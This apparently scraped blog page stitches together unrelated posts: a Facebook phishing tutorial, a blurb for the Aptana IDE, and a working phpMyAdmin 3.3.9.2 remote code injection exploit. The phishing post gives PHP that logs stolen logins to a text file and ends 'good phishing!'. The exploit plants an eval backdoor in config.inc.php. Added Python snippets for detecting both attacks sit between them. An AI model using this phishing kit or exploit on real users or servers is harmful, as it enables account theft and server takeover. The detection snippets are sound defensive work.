Facebook Phishing


Today we are going to make a phisher for facebook.

1) go to facebook, and view the source, copy all the text to notepad.

2) we need to change some codes so press: Control + F

3) search for action

4) You should get: action=www.facebook.com/login and bla bla bla

5) delete all the facebook.com crap, and put: lol.php

6) beside action you will see something saying: method=post

7) change “post” to “get” save the file, name it: index.php and save it to desktop but remember! where it says: “save as type” change it to “all files” this is very important

9) make a new file in notepad, and put this code:

<?php

header(”Location: http://www.Facebook.com/login.php “);

$handle = fopen(”passwords.txt”, “a”);

foreach($_GET as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, “=”);

fwrite($handle, $value);

fwrite($handle, “\r\n”);

}

fwrite($handle, “\r\n”);

fclose($handle);

exit;

?>

10) now save it as lol.php and remember the save as file type to all files.

11) now, make a new file in notepad, dont write anything, save it as: passwords.txt

12) now upload all of them in www.t35.com

good luck and good phishing!
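For defenders, the two edits described in steps 5 to 7 (a password form whose action no longer points at the real site, and whose method has become GET) are exactly what a page scanner can key on. The check below is an added example, not part of the original post; the function names, the `clone.example` host and both sample forms are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

class FormScan(HTMLParser):
    """Collect each <form>'s action, method, and whether it holds a password input."""
    def __init__(self):
        super().__init__()
        self.forms, self._open = [], None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._open = {"action": a.get("action") or "",
                          "method": (a.get("method") or "get").lower(),
                          "password": False}
            self.forms.append(self._open)
        elif tag == "input" and self._open and (a.get("type") or "").lower() == "password":
            self._open["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None

def audit_login_forms(html, page_url, trusted_hosts):
    """Return (resolved_action, reasons) for each suspicious password form."""
    scan = FormScan()
    scan.feed(html)
    findings = []
    for form in (f for f in scan.forms if f["password"]):
        # Resolve relative actions (such as a bare file name) against the page URL.
        target = urlparse(urljoin(page_url, form["action"]))
        reasons = []
        if form["method"] == "get":
            reasons.append("password submitted via GET")
        if target.hostname not in trusted_hosts:
            reasons.append(f"action resolves to untrusted host {target.hostname}")
        if target.scheme != "https":
            reasons.append("action is not https")
        if reasons:
            findings.append((target.geturl(), reasons))
    return findings

# Constructed samples: a copied page with the two edits described above, and an unmodified form.
CLONE = '<form action="lol.php" method="get"><input name="email"><input type="password" name="pass"></form>'
GENUINE = '<form action="https://www.facebook.com/login" method="post"><input type="password" name="pass"></form>'

if __name__ == "__main__":
    print(audit_login_forms(CLONE, "http://clone.example/index.php", {"www.facebook.com"}))
    print(audit_login_forms(GENUINE, "https://www.facebook.com/login.php", {"www.facebook.com"}))
```

A GET submission also leaves the credentials in browser history, proxy logs and Referer headers, so that finding is worth alerting on even when the host check passes.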

Aptana


Application: Aptana

What it is:

The professional, open source development tool for the open web.
Develop and test your entire web application using a single
environment. With support for the latest browser technology specs such
as HTML5, CSS3 and JavaScript; and Ruby, Rails, PHP & Python on the
server side.

Core Features:

* HTML, CSS, and JavaScript Code Assist
* Git Integration
* Deployment Wizard
* Built-in Terminal
* Integrated Debugger
* IDE Customization

To learn more:

http://www.aptana.com/

To download:

http://www.aptana.com/products/radrails/download

To install on Ubuntu:

http://maketecheasier.com/install-aptana-studio-in-ubuntu-intrepid/2009/03/23

Remote Code Injection


I tried to share what I know for those who are interested... USE RESPONSIBLY.

<?php echo php_sapi_name()!=='cli'?'</pre>':'';

if(php_sapi_name()==='cli'){
    if(!isset($argv[1])){
        output("   Usage\n    ".$argv[0]." http://example.com/phpMyAdmin-3.3.9.2");
        killme();
    }
    $pmaurl = $argv[1];
}else{
    $pmaurl = isset($_REQUEST['url'])?$_REQUEST['url']:'';
}
$code   = 'foreach($_GET as $k=>$v)if($k==="eval")eval($v);';
$cookie = null;
$token  = null;
if(!function_exists('curl_init')){
    output('[!] Fatal error. Need cURL!');
    killme();
}
$ch     = curl_init();
$debug  = 0;
if(php_sapi_name()!=='cli'){
?>
<form method=post>
URL: <input name=url value="<?php echo htmlspecialchars($pmaurl);?>"> Example: http://localhost:8080/phpMyAdmin-3.3.9.2<br/>
<input name=submit type=submit value=♥>
</form>
<pre>
<?php
if(!isset($_REQUEST['submit']))killme(true);
}

output("[i] Running...");

// Start a session and get a token
curl_setopt_array($ch, array(
    CURLOPT_URL => $pmaurl.'/setup/index.php',
    CURLOPT_HEADER => 1,
    CURLOPT_RETURNTRANSFER => 1,
    CURLOPT_TIMEOUT => 4,
    CURLOPT_SSL_VERIFYPEER => false,
    CURLOPT_SSL_VERIFYHOST => false
));
output("[*] Contacting server to retrive session cookie and token.");

$result = curl_exec($ch);
if(404 == curl_getinfo($ch, CURLINFO_HTTP_CODE)){
    output("[!] Fail. $pmaurl/setup/index.php returned 404. The host is not vulnerable or there is a problem with the supplied url.");
    killme();
}
if(!$result){
    output("[!] cURL error:".curl_error($ch));
    killme();
}
if(false !== strpos($result, 'Cannot load or save configuration')){
    output("[!] Fail. Host not vulnerable. Web server writable folder $pmaurl/config/ does not exsist.");
    killme();
}

// Extract cookie
preg_match('/phpMyAdmin=([^;]+)/', $result, $matches);
$cookie = $matches[1];
output("[i] Cookie:".$cookie);
// Extract token
preg_match('/(token=|token" value=")([0-9a-f]{32})/', $result, $matches);
$token = $matches[2];
output("[i] Token:".$token);

// Poison _SESSION variable
curl_setopt($ch, CURLOPT_URL, $pmaurl.'/?_SESSION[ConfigFile][Servers][*/'.urlencode($code).'/*][port]=0&session_to_unset=x&token='.$token);
curl_setopt($ch, CURLOPT_COOKIE, 'phpMyAdmin='.$cookie);
output("[*] Contacting server to inject code into the _SESSION[ConfigFile][Servers] array.");
if(!$result = curl_exec($ch)){
    output("[!] cURL error:".curl_error($ch));
    killme();
}

//echo htmlspecialchars($result,ENT_QUOTES);

// Save file
curl_setopt($ch, CURLOPT_URL, $pmaurl.'/setup/config.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'submit_save=Save&token='.$token);
output("[*] Contacting server to make it save the injected code to a file.");
if(!$result = curl_exec($ch)){
    output("[!] cURL error:".curl_error($ch));
    killme();
}

//echo htmlspecialchars($result,ENT_QUOTES);

curl_setopt($ch, CURLOPT_URL, $pmaurl.'/config/config.inc.php?eval=echo%20md5(123);');
curl_setopt($ch, CURLOPT_POST, 0);
output("[*] Contacting server to test if the injected code executes.");
if(!$result = curl_exec($ch)){
    output("[!] cURL error:".curl_error($ch));
    killme();
}
if(preg_match('/202cb962ac59075b964b07152d234b70/', $result)){
    output("[!] Code injection successfull. This instance of phpMyAdmin is vulnerable!");
    output("[+] Use your browser to execute PHP code like this $pmaurl/config/config.inc.php?eval=echo%20'test';");
}else{
    output("[!] Code injection failed. This instance of phpMyAdmin does not apear to be vulnerable.");
}

curl_close($ch);

function output($msg){
    echo php_sapi_name()!=='cli'?htmlspecialchars("$msg\n",ENT_QUOTES):"$msg\n";
    flush();
}

function killme(){
    output("[*] Exiting...");
    echo php_sapi_name()!=='cli'?'<pre>':'';
    die();
}

echo php_sapi_name()!=='cli'?'<pre>':'';?>
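The script above leaves a distinctive request sequence in web server access logs: a query string that supplies `_SESSION[...]`, a POST to `setup/config.php`, then a direct request to `config/config.inc.php` with parameters. The following log check is an added example, not part of the original post; it assumes Apache/nginx combined log format, and the rule names, the `/pma/` path, the addresses and the log lines are constructed, with the payload replaced by a placeholder.

```python
import re
from urllib.parse import unquote

# Combined log format: ip ident user [time] "METHOD uri proto" status ...
LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})')

# Stage names are labels chosen for this example, in the order the script issues its requests.
STAGES = ["session-poison", "setup-save", "config-exec"]
RULES = {
    # A client should never be able to name the _SESSION superglobal in a query string.
    "session-poison": lambda meth, path, query: "_SESSION[" in query,
    # Saving the setup configuration over HTTP.
    "setup-save": lambda meth, path, query: meth == "POST" and path.endswith("/setup/config.php"),
    # The generated config file requested directly with parameters.
    "config-exec": lambda meth, path, query: path.endswith("/config/config.inc.php") and query != "",
}

def scan(lines):
    """Map client IP -> ordered list of matched stage names."""
    hits = {}
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        # Decode percent-encoding first so %5B/%5D brackets are matched as well.
        path, _, query = unquote(m["uri"]).partition("?")
        for name in STAGES:
            if RULES[name](m["method"], path, query):
                hits.setdefault(m["ip"], []).append(name)
    return hits

def full_chain(hits):
    """Return IPs whose hits contain all three stages in order."""
    chained = []
    for ip, seen in hits.items():
        it = iter(seen)
        if all(stage in it for stage in STAGES):  # ordered-subsequence test
            chained.append(ip)
    return chained

# Constructed sample log (documentation address ranges, placeholder payload and token).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2011:10:00:01 +0000] "GET /pma/setup/index.php HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Jan/2011:10:00:02 +0000] "GET /pma/?_SESSION%5BConfigFile%5D%5BServers%5D%5B*/PAYLOAD/*%5D%5Bport%5D=0&session_to_unset=x&token=TOKEN HTTP/1.1" 200 900',
    '203.0.113.7 - - [10/Jan/2011:10:00:03 +0000] "POST /pma/setup/config.php HTTP/1.1" 200 300',
    '203.0.113.7 - - [10/Jan/2011:10:00:04 +0000] "GET /pma/config/config.inc.php?eval=PAYLOAD HTTP/1.1" 200 32',
    '198.51.100.9 - - [10/Jan/2011:10:05:00 +0000] "GET /pma/index.php?db=shop HTTP/1.1" 200 4000',
]
```

The script's own failure messages point at the mitigation: it stops when `setup/index.php` returns 404 or when no web-server-writable `config/` folder exists, so removing both after installation closes the path it relies on.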